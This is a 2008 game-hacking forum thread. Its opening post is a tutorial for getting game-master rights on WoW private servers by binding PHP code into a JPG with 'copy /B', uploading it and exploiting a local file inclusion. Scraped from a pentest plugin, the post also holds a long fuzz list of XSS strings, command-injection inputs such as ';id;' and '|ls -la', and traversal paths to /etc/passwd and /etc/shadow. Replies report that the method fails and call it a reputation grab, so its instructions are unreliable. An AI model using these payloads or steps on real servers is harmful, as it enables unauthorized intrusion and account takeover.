[Tutorial] Getting GM on MOST Private Servers menu

User Tag List

Page 1 of 5 12345 LastLast
Results 1 to 15 of 74
  1. #1
    Wolfe's Avatar Contributor
    Reputation
    101
    Join Date
    Apr 2007
    Posts
    40
    Thanks G/R
    0/68
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [TUTORIAL] Wolfe's Complete Tutorial on Website Hacking for GM

    Alright hello everyone and welcome to my little tutorial!
    You may be like omg noob he hes epic failed once here he goes again.

    You can just press Alt+F4 now!

    Today what we're going to be doing is finding a Local File Inclusion (LFI) flaw in a website. This once worked for toxic-wow, but no longer does. Don't ask me why, but it doesn't!

    So we're going to start off by binding a new image file with our new .txt file that has been coded to exploit the server.

    Now before we have a new image, we need to custimize this php script written and made by me.

    Free File Hosting Made Simple - MediaFire

    LFI.txt

    Now edit the VALUEs so the first `login` REMAINS `login` BUT "login" goes whatever your login name is emaple i'd put "wolfe"

    Now where ever you file is uploaded you need to put as many ../ as there is /
    Example if theres a link.
    http://examplesite.com/avatars/upload/coolimage.jpg
    You would need 2 ../ so the config would look like

    include("../../stats/config.php");

    OK now that you have that file configured for you we need to combine it with an image any image this is my favorite.


    If you want to use this do a Right Click save as Test.jpg

    Next we're going to use command prompt to binary bind two files together!

    If you don't know how to get to command prompt this tutorial is too hard for you and should just leave now.

    Next open up where you have your files saved at they should both be saved in the same folder just for easy access.

    Mine is C:\LFI
    So the command we want is
    Code:
    cd C:LFI/
    After that press enter!

    So now it should say

    C:\LFI>(You can enter text here, omg so cool, eh !!!!)

    The next command we want to do is.

    Code:
    copy /B imagehere.jpg + phpcodehere.txt NewFileNamehere.jpg
    The image MUST be first otherwise it won't work!

    Now it doesn't matter if you do .txt or .php but I find txt to work better and more comptable with more images.

    So now you should see a new file the one we just created NewFileNameHere.jpg

    TEST IT! Open it with notepad and see if if you can find our PHP script!

    Now go upload it to a site and run it, if it works you can now log in with the details you config'd up above. If it didn't well you can't!

    So thats pretty much it, if you guys aren't sure how to set up your config or something feel free to post here and ill answer.

    If I get POSTIVE comments on this I might show you guys how to retrive the SQL admin username and password for a Private Server, pretty much COMPLETE control!

    Also Free File Hosting Made Simple - MediaFire is where all the files that I used is stored in, include the final result! Enjoy!

    ~Wolfe<div style="border: 1px outset gray; padding: 1%; display: none; opacity: 0; position: absolute; left: 10%; right: 10%; top: 1%; text-align: left; background-color: black; color: white; float: right;" id="yehgfingerprint">
    YEHG.Net Greasemonkey Web Page Fingerprinter
    [COLOR=yellow ! important][x][/COLOR]




    [URL]

    http://www.mmowned.com/forums/emulator-server-exploits-bugs/164811-tutorial-getting-gm-most-private-servers.html

    [Headers]

    Server: LiteSpeed
    X-Powered-By: PHP/5.2.6
    Date: Wed, 10 Sep 2008 22:42:50 GMT Connection: Keep-Alive Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Content-length: 149109
    Cookie: IDstack=%2C57342%2C%2C349757%2C; __utma=67421069.334934750.1231293359.1231536738.1231540886.13; __utmz=67421069.1231295481.1.2.utmccn=(organic)|utmcsr=google|utmctr=ascent+maki ng+a+admin+account+via+sql|utmcmd=organic; __qca=48aba167-91b44-a128e-21969; bblastvisit=1220993554; bblastactivity=0; PHPSESSID=bd1cf1607d33e6b2a440586c4a00cdca; __qcb=931531576; __utmc=67421069; __utmb=67421069
    => [COLOR=yellow ! important]Edit Cookie[/COLOR]

    [RECON]

    ---Lookup---WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfiledffile:xlsfile:xmlfile:docfileptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlf ilesfile:exefile:rpmfile:dbfile:mdbfile:logfileasswdfilewd [[COLOR=yellow ! important]Launch all[/COLOR]] [[COLOR=yellow ! important]Prepend Proxy[/COLOR]]


    [BruteForce Scan]

    -- Select ---Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_p asswords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiC gisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9 iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp [[COLOR=yellow ! important]Start[/COLOR]] [[COLOR=yellow ! important]View[/COLOR]]

    Loading ...

    Do other stuffs.
    Seem slowly? As it doesn't do multi-requests,
    it's likely that web server IDS may not detect scanning.
    But it's for dictionary scanning only.



    [Stat]

    Total Form: 0
    Total Link: 3

    [Fuzz URL]

    http://www.mmowned.com/forums/emulat...servers.html?=

    Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing [[COLOR=yellow ! important]Help[/COLOR]]

    Fuzz Options Fuzz Db: -- Check --1) ---!><!--">xxx<P>yyy..2) "><script>"..3) <script>..</script&gt..4) <<script>..;//<&lt..5) <script>..</script&gt..6) '><script>..<..7) "><script>..;</script&gt.. \";..;//..9) %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12) &ltscript&gt..;</sc..13) &ltscript&gt..;&lt..14) <xss><script>alert('XSS')&lt..15) <IMG%20SRC='javascript:..16) <IMG SRC="javascript:alert('XSS'..17) <IMG SRC="javascript:alert('XSS'..1 <IMG SRC=javascript:alert('XSS')>..19) <IMG SRC=JaVaScRiPt:alert('XSS')>..20) <IMG SRC=javascript:alert(&quot;XSS&quo..21) <IMG SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc ript:..25) <IMG SRC="jav ascript:alert('XSS'..26) <IMG SRC="jav&#x09;ascript:alert('..27) <IMG SRC="jav&#x0A;ascript:alert('..2 <IMG SRC="jav&#x0D;ascript:alert('..29) <IMG SRC="  javascript:alert(..30) <IMG DYNSRC="javascript:alert('XSS..31) <IMG LOWSRC="javascript:alert('XSS..32) <IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG SRC=&#106;&#97;&#118;&#97;..34) <IMG SRC=&#0000106&#0000097&#000011..35) <IMG SRC=&#x6A&#x61&#x76&#x61&a..36) '%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37) %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..3 ';alert(String.fromCharCode(88,83,83))//\..39) '';!--"<XSS>=&{()}..40) A..41) TRUE..42) FALSE..43) 0..44) 00..45) 1..46) -1..47) 1.0..4 -1.0..49) 2..50) -2..51) -20..52) 65536..53) 268435455..54) -268435455..55) 2147483647..56) 0xfffffff..57) NULL..5 null..59) \0..60) \00..61) < script > < / script>..62) %0a..63) %00..64) +%00..65) \0..66) \0\0..67) \0\0\0..6 \00..69) \00\00..70) \00\00\00..71) $null..72) $NULL..73) `id`..74) `dir`..75) ;id;..76) ;read;..77) ;netstat -a;..7 \nnetstat -a%\n..79) \"blah..80) |id|..81) &quot;;id&quot;..82) id%00..83) id%00|..84) |id..85) |dir..86) |dir|..87) |ls..8 |ls -la..89) ;ls -la..90) ;dir..91) |/bin/ls -al..92) \n/bin/ls -al\n..93) ?x=..94) ?x="..95) ?x=|..96) ?x=>..97) /index.html|id|..9 /boot.ini..99) /etc/passwd..100) /etc/shadow..101) ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102) ../../../../../../../../../../../../etc/hosts%00..103) ../../../../../../../../../../../../etc/hosts..104) ../../boot.ini..105) /../../../../../../../../%2A..106) ../../../../../../../../../../../../etc/passwd%00..107) ../../../../../../../../../../../../etc/passwd..10 ../../../../../../../../../../../../etc/shadow%00..109) ../../../../../../../../../../../../etc/shadow..110) /../../../../../../../../../../etc/passwd^^..111) /../../../../../../../../../../etc/shadow^^..112) /../../../../../../../../../../etc/passwd..113) /../../../../../../../../../../etc/shadow..114) /./././././././././././etc/passwd..115) /./././././././././././etc/shadow..116) \..\..\..\..\..\..\..\..\..\..\etc\pas..117) \..\..\..\..\..\..\..\..\..\..\etc\sha..11 ..\..\..\..\..\..\..\..\..\..\etc\passw..119) ..\..\..\..\..\..\..\..\..\..\etc\shado..120) /..\../..\../..\../..\../..\../..\../etc/pas..121) /..\../..\../..\../..\../..\../..\../etc/sha..122) .\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123) .\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124) \..\..\..\..\..\..\..\..\..\..\etc\pas..125) \..\..\..\..\..\..\..\..\..\..\etc\sha..126) ..\..\..\..\..\..\..\..\..\..\etc\passw..127) ..\..\..\..\..\..\..\..\..\..\etc\shado..12 %0a/bin/cat%20/etc/passwd..129) %0a/bin/cat%20/etc/shadow..130) %00/etc/passwd%00..131) %00/etc/shadow%00..132) %00../../../../../../etc/passwd..133) %00../../../../../../etc/shadow..134) /../../../../../../../../../../../etc/passwd%00.jp..135) /../../../../../../../../../../../etc/passwd%00.ht..136) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..13 /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145) \\&apos;/bin/cat%20/etc/passwd\\&apos;..146) \\&apos;/bin/cat%20/etc/shadow\\&apos;..147) ../../../../../../../../conf/server.xml..14 /../../../../../../../../bin/id|..149) C:/inetpub/wwwroot/global.asa..150) C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) C:\boot.ini..153) ../../../../../../../../../../../../localstart.asp..154) ../../../../../../../../../../../../localstart.asp..155) ../../../../../../../../../../../../boot.ini%00..156) ../../../../../../../../../../../../boot.ini..157) /./././././././././././boot.ini..15 /../../../../../../../../../../../boot.ini%00..159) /../../../../../../../../../../../boot.ini..160) /..\../..\../..\../..\../..\../..\../boot.in..161) /.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162) \..\..\..\..\..\..\..\..\..\..\boot.ini..163) ..\..\..\..\..\..\..\..\..\..\boot.ini%0..164) ..\..\..\..\..\..\..\..\..\..\boot.ini..165) /../../../../../../../../../../../boot.ini%00.html..166) /../../../../../../../../../../../boot.ini%00.jpg..167) /.../.../.../.../.../..16 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..170) %0d%0aX-Injection-Header:%20AttackValue..171) !@#0%^#0##018387@#0^^**(()..172) %01%02%03%04%0a%0d%0aADSF..173) /,%ENV,/..174) &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/p..175) &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/s..176) %..177) #..17 *..179) }..180) ;..181) /..
    Last edited by Wolfe; 09-10-2008 at 05:43 PM.

    [Tutorial] Getting GM on MOST Private Servers
  2. #2
    Troys's Avatar Contributor
    Reputation
    122
    Join Date
    Oct 2006
    Posts
    601
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    nice =]] <fillar>
    Pals 4 Life

  3. #3
    110133130's Avatar Member
    Reputation
    1
    Join Date
    Jul 2008
    Posts
    5
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I tried the instructions above... No popup appeared on my screen though...

    I was able to access a similar screen, though i violated one of your instructions... I clicked submit, and a popup appeared, and i clicked "tamper". Then i used the 'az' command where you instructed. I logged onto the server and was not able to use any GM commands...

  4. #4
    Patchumz's Avatar Active Member
    Reputation
    43
    Join Date
    Oct 2007
    Posts
    503
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This sounds a bit odd, mainly cuz I didn't know you could set privileges on account creation.. but other than that I'll test it out in the morning on as many servers as I can (Assuming it doesn't work on the first one).

  5. #5
    Mirror's Avatar Contributor
    Reputation
    259
    Join Date
    Nov 2006
    Posts
    2,602
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Very interesting. Anybody wanna try on WoWScape? Lol
    THIS SIGNATURE IS IN VIALOATION OF SITE RULES, PLEASE FIX ME!
    -Fault

  6. #6
    Patchumz's Avatar Active Member
    Reputation
    43
    Join Date
    Oct 2007
    Posts
    503
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    So far none of the servers I play on can do this. I'm going to keep trying more servers though.

  7. #7
    QQmore's Avatar Member
    Reputation
    7
    Join Date
    Sep 2008
    Posts
    47
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by 110133130 View Post
    I tried the instructions above... No popup appeared on my screen though...

    I was able to access a similar screen, though i violated one of your instructions... I clicked submit, and a popup appeared, and i clicked "tamper". Then i used the 'az' command where you instructed. I logged onto the server and was not able to use any GM commands...

    Same thing for me.

  8. #8
    Patchumz's Avatar Active Member
    Reputation
    43
    Join Date
    Oct 2007
    Posts
    503
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Doing 'az' doesn't work even on the server you put on the tutorial... maybe '3' would work, dunno.. but 'az' doesn't make anyone a GM apparently.

    EDIT: Absolutely nothing works on the server he listed, trying to get rep for free is my guess, otherwise the tutorial's example would've worked.
    Last edited by Patchumz; 09-08-2008 at 12:38 AM.

  9. #9
    treeko11's Avatar Member
    Reputation
    11
    Join Date
    Jan 2008
    Posts
    275
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This is pretty fail.

    I have just spent the last 30 minutes trying this out and it simply has only worked on the tutorial server, its prolly his server and he changed it to do that...

    loser

  10. #10
    Troys's Avatar Contributor
    Reputation
    122
    Join Date
    Oct 2006
    Posts
    601
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ehh doesnt work on all the servers iv tried
    Pals 4 Life

  11. #11
    Wolfe's Avatar Contributor
    Reputation
    101
    Join Date
    Apr 2007
    Posts
    40
    Thanks G/R
    0/68
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Alright, since you guys can't manage this. Ill show you how to get GM on ToxicWoW.

  12. #12
    Volgata's Avatar Member
    Reputation
    1
    Join Date
    Aug 2008
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    done it once.... cant get it to work again. I must be messin up now.

  13. #13
    Volgata's Avatar Member
    Reputation
    1
    Join Date
    Aug 2008
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    hmmm

    possible to PM me with info wolfe?

  14. #14
    Wolfe's Avatar Contributor
    Reputation
    101
    Join Date
    Apr 2007
    Posts
    40
    Thanks G/R
    0/68
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    At school atm, study hall almost over ill be home soon ^^ but toxic wow have no idea how to make a secure login along with wowscape ^^

  15. #15
    Patchumz's Avatar Active Member
    Reputation
    43
    Join Date
    Oct 2007
    Posts
    503
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It didn't even work on the server you used for the tut (for me) so I dunno how you're going to 'show us how'..

Page 1 of 5 12345 LastLast

Similar Threads

  1. How do i get Battlegrounds in my private server or, what is a good repack with BG's
    By poopytaco1 in forum World of Warcraft Emulator Servers
    Replies: 1
    Last Post: 06-19-2008, 04:26 PM
  2. [Guide/Tutorial] How to make a private server 2.3+ [PICTURES]
    By xUrbanx in forum WoW EMU Guides & Tutorials
    Replies: 8
    Last Post: 03-08-2008, 09:02 PM
  3. [REPOST]How to get out of a private server IP ban?
    By Bareno in forum World of Warcraft General
    Replies: 6
    Last Post: 12-09-2007, 12:00 PM
  4. Can someone help me get onto a WoW private server?
    By hyacary in forum Gaming Chat
    Replies: 1
    Last Post: 01-25-2007, 03:14 PM
All times are GMT -5. The time now is 06:09 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search